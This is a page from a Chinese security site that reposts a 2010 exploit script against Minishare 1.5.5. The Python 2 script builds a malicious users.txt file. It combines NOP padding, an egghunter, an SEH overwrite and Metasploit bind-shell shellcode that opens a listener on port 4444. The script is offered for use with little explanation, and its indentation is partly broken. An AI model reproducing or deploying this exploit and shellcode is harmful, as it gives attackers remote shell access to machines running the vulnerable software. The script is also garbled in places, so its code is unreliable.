首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version
来源:vfocus.net 作者:0v3r 发布时间:2010-11-22  

# Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version
# Date: 11/19/2010
# Author: 0v3r
# Bug Found By: Chris Gabriel
# Software Link: http://sourceforge.net/projects/minishare
# Version: 1.5.5
# Tested on: Windows XP SP3 EN
# CVE: N/A

#!/usr/bin/python

# Just rewrote the exploit using egghunter to inject a bind shell payload
# Bug found by Chris Gabriel credit goes to him
#
# To exploit just place the users.txt file in the Minishare root directory and run minishare.exe

egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x77\x30\x30\x74" # EGG w00t
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

# win32_bind -  EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
shellcode =("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x43"
"\x58\x30\x41\x30\x50\x42\x6b\x42\x41\x53\x42\x32\x42\x41\x32\x41"
"\x42\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x7a\x49\x4b\x4c\x50"
"\x6a\x78\x6b\x72\x6d\x6b\x58\x6b\x49\x79\x6f\x6b\x4f\x49\x6f\x53"
"\x50\x4c\x4b\x30\x6c\x56\x44\x46\x44\x6e\x6b\x32\x65\x35\x6c\x4c"
"\x4b\x41\x6c\x67\x75\x44\x38\x65\x51\x6a\x4f\x6c\x4b\x50\x4f\x64"
"\x58\x6c\x4b\x71\x4f\x75\x70\x74\x41\x5a\x4b\x33\x79\x6c\x4b\x70"
"\x34\x4e\x6b\x57\x71\x4a\x4e\x56\x51\x6f\x30\x4f\x69\x4c\x6c\x6c"
"\x44\x69\x50\x71\x64\x44\x47\x4b\x71\x7a\x6a\x54\x4d\x63\x31\x58"
"\x42\x5a\x4b\x4b\x44\x37\x4b\x30\x54\x65\x74\x37\x58\x70\x75\x38"
"\x65\x4e\x6b\x53\x6f\x61\x34\x56\x61\x58\x6b\x30\x66\x6e\x6b\x76"
"\x6c\x50\x4b\x6c\x4b\x31\x4f\x75\x4c\x73\x31\x4a\x4b\x53\x33\x46"
"\x4c\x4e\x6b\x6c\x49\x32\x4c\x77\x54\x55\x4c\x45\x31\x4b\x73\x45"
"\x61\x4b\x6b\x55\x34\x4e\x6b\x37\x33\x30\x30\x4e\x6b\x51\x50\x64"
"\x4c\x6c\x4b\x52\x50\x45\x4c\x6e\x4d\x4e\x6b\x31\x50\x37\x78\x73"
"\x6e\x50\x68\x6c\x4e\x52\x6e\x74\x4e\x48\x6c\x52\x70\x49\x6f\x48"
"\x56\x41\x76\x30\x53\x30\x66\x35\x38\x74\x73\x76\x52\x30\x68\x70"
"\x77\x70\x73\x37\x42\x71\x4f\x73\x64\x49\x6f\x58\x50\x53\x58\x58"
"\x4b\x7a\x4d\x4b\x4c\x75\x6b\x42\x70\x79\x6f\x4e\x36\x73\x6f\x4e"
"\x69\x4d\x35\x55\x36\x4e\x61\x6a\x4d\x66\x68\x47\x72\x30\x55\x50"
"\x6a\x64\x42\x39\x6f\x48\x50\x33\x58\x6e\x39\x35\x59\x6a\x55\x4c"
"\x6d\x73\x67\x4b\x4f\x4b\x66\x76\x33\x62\x73\x66\x33\x70\x53\x53"
"\x63\x57\x33\x56\x33\x61\x53\x53\x63\x6b\x4f\x4a\x70\x51\x76\x63"
"\x58\x46\x71\x71\x4c\x72\x46\x63\x63\x6c\x49\x6b\x51\x4f\x65\x61"
"\x78\x4d\x74\x44\x5a\x32\x50\x59\x57\x51\x47\x6b\x4f\x58\x56\x72"
"\x4a\x32\x30\x50\x51\x42\x75\x6b\x4f\x68\x50\x42\x48\x4f\x54\x4e"
"\x4d\x44\x6e\x6d\x39\x33\x67\x4b\x4f\x68\x56\x76\x33\x73\x65\x79"
"\x6f\x6e\x30\x73\x58\x6b\x55\x33\x79\x4e\x66\x37\x39\x30\x57\x59"
"\x6f\x58\x56\x70\x50\x53\x64\x50\x54\x63\x65\x4b\x4f\x4e\x30\x4f"
"\x63\x72\x48\x78\x67\x62\x59\x7a\x66\x44\x39\x42\x77\x79\x6f\x48"
"\x56\x66\x35\x4b\x4f\x6a\x70\x30\x66\x50\x6a\x50\x64\x70\x66\x50"
"\x68\x71\x73\x62\x4d\x6d\x59\x78\x65\x32\x4a\x52\x70\x56\x39\x54"
"\x69\x58\x4c\x6f\x79\x68\x67\x51\x7a\x67\x34\x6f\x79\x6d\x32\x36"
"\x51\x6f\x30\x78\x73\x4c\x6a\x4b\x4e\x72\x62\x76\x4d\x4b\x4e\x63"
"\x72\x44\x6c\x6c\x53\x6c\x4d\x73\x4a\x75\x68\x6e\x4b\x6e\x4b\x6e"
"\x4b\x75\x38\x33\x42\x6b\x4e\x48\x33\x45\x46\x59\x6f\x32\x55\x47"
"\x34\x4b\x4f\x49\x46\x63\x6b\x41\x47\x61\x42\x70\x51\x71\x41\x72"
"\x71\x52\x4a\x36\x61\x70\x51\x30\x51\x33\x65\x70\x51\x6b\x4f\x4e"
"\x30\x51\x78\x6c\x6d\x5a\x79\x57\x75\x78\x4e\x53\x63\x49\x6f\x6a"
"\x76\x63\x5a\x49\x6f\x6b\x4f\x56\x57\x6b\x4f\x5a\x70\x6e\x6b\x42"
"\x77\x6b\x4c\x4b\x33\x6b\x74\x73\x54\x4b\x4f\x6e\x36\x36\x32\x6b"
"\x4f\x68\x50\x35\x38\x31\x6e\x4b\x68\x5a\x42\x44\x33\x72\x73\x6b"
"\x4f\x4e\x36\x4b\x4f\x7a\x70\x43")

nops     = "\x90" * (386 - len(egghunter))
morenops = "\x90" * 32             # need enough NOPs to overwrite the first instance of the egg
seh      = "\xE7\x13\x40\x00"      # POP POP RET
nseh     = "\xeb\xc0\x90\x90"      # short jump 64 bytes
egg      = "w00tw00t"              # the key the egghunter looks for

buff     = nops  + egghunter  +  nseh + seh  + morenops + egg + shellcode

#[nops][ egghunter][short jmp (nseh)][seh (pop pop ret)][nops][w00tw00t][shellcode]

try:
  f = open("users.txt",'w')
 f.write(buff)
 f.close()

 print "\n" 
 print "\t---------------------------------------------------------------------------------"
 print "\t| Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version |"
 print "\t---------------------------------------------------------------------------------"
 print "\n"
 
 print "\t- File 'users.txt' created..."
 print "\t- Place the 'users.txt' file in the Minishare directory and run the program...\n"
except:
 print "\t-Oooops! Can't write file 'users.txt'...\n"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Free CD to MP3 Converter 3.1 B
·Windows Task Scheduler Privile
·Native Instruments Massive 1.1
·Native Instruments Service Cen
·Native Instruments Traktor Pro
·Xion Audio Player 1.0.126 (.m3
·Native Instruments Kontakt 4 P
·Xion Audio Player 1.0.127 (m3u
·Netcraft Toolbar 1.8.1 Remote
·FreeNAS exec_raw.php Arbitrary
·ImageShack Toolbar 4.8.3.75 Re
·Xion Audio Player 1.0.126 Buff
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved